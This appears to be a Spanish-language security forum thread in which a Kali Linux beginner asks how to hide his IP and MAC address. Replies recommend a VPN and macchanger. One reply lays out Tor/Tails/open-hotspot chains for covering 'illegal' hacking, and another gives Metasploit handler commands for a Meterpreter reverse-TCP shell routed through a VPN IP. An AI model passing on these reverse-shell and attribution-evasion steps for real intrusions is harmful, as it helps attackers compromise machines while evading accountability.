Buenas.

Quiero empezar a hacer pruebas con Kali Linux y, aunque no tengo intención de hacer nada malicioso, no me gustaría dejar rastro.

¿Existe alguna manera de enmascarar la IP de salida o la MAC? Y no me refiero a proxies web, ya que toda la actividad saldrá por la misma interfaz y no necesariamente por el navegador.

Cualquier indicación será bienvenida.

Muchas gracias!
Un VPN para la IP .. ( No quiero hacer publicidad pero yo uso NordVpn( de pago ) , y estoy muy contento con el :dance2: ...
question de Nologs y privacidad parece bastante solido y esta basado en ese fabuloso país para los derecho de privacidad que es Panama :alaba: ...

Y macchanger (integrado a kali linux) para la MAC ..

Para la MAC en kali linux me acuerdo que un día al momento de una actualización preguntaba si querías modificarla automáticamente . pero bueno sino pues con MACCHANGER ..
“Gran parte de lo que ganarás no procederá de tu brillantez, sino de la ineptitud de tus oponentes.” :cool:

“Mira alrededor tuyo, si no sabes quien es el primo, entonces tú eres el primo.” :g:
banderas20 escribió: 15 Sep 2017, 15:40 ¿Cómo puede una VPN enmascarar la IP que sale de mi router, si ésta me la asigna el operador?

Muchas gracias!
El VPN no enmascara la IP que sale de tu router ! pero si te esconde del resto del mundo !

Es decir, tu IP asignada por el operador te permite tener acceso a internet, esa no se puede cambiar al menos que directamente uses un HotSpot o un wifi que no sea tuyo pero no es de lo que estamos hablando.

Realmente con un VPN lo que haces es pasar por "Túneles" , es decir tu IP "real" se conecta al VPN y desde ahi todo lo que hagas pasa por el VPN.

No se si me explico .. El esquema de tu conexion seria : Tu IP ==> VPN ==> internet ... Si el resto del mundo que sea aplicaciones o paginas web desea saber quien eres les resultara imposible ya que tu no te estas conectado a nada a parte del VPN ! y el VPN se conecta por ti a la web ..

Imagen


La única manera de saber quien eres es si tu proveedor de VPN te denuncia contestando a una demanda oficial..

Hay muchos debates por la web sobre el tema de VPN logs ( que guardan los datos de tus conecciones por si a caso pirateas la nasa y te tienen que denunciar) y los NoLogs ( que "supuestamente" no guardan nada por lo cual "supuestamente" aunque quisieran no podrian ayudar a las autoridades ya que no tienen datos guardados).
Yo elegí NordVpn porque esta basado en panama (donde el gobierno no exige tener ningún datos sobre los clientes y sus conexiones ( "supuestamente" ) y parecen tener una politica de privacidad bastante buena.

Para Hacking, mientras no hagas locuras creo que con un VPN te vale, si pasas a mas, a hacer cosas mas "ilegales" ya tienes que cubrirte mucho mas .. tipo Tu IP ==> VPN ==>Virtual machine Os type tails ==> Tor + socks5 ... ese tipo de config .. o aun mejor : Un hotspot o wifi abierto ==> tails==> tor+sock5 ...

Bueno sobre eso también hay mucho debate. (sobre configuraciones de anonimato )...
“Gran parte de lo que ganarás no procederá de tu brillantez, sino de la ineptitud de tus oponentes.” :cool:

“Mira alrededor tuyo, si no sabes quien es el primo, entonces tú eres el primo.” :g:
Claro, otra cosa se me ocurre, si piensas usar exploit de tipo "reverse" TCP ect ... deberas configurar el exploit de tal manera :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Es importante saber que en este caso que cualquier persona que este usando la IP del VPN y que (muy poco probable) este en escucha del mismo port con el cual has configurado tu exploit tendría acceso a la maquina atacada al igual que tu ! Ya que el reverse se hará a la IP del VPN !
“Gran parte de lo que ganarás no procederá de tu brillantez, sino de la ineptitud de tus oponentes.” :cool:

“Mira alrededor tuyo, si no sabes quien es el primo, entonces tú eres el primo.” :g:
Responder

Volver a “General”